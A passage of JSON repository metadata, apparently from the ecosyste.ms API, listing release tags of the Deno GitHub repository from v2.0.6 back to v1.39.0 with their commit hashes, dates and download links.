.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_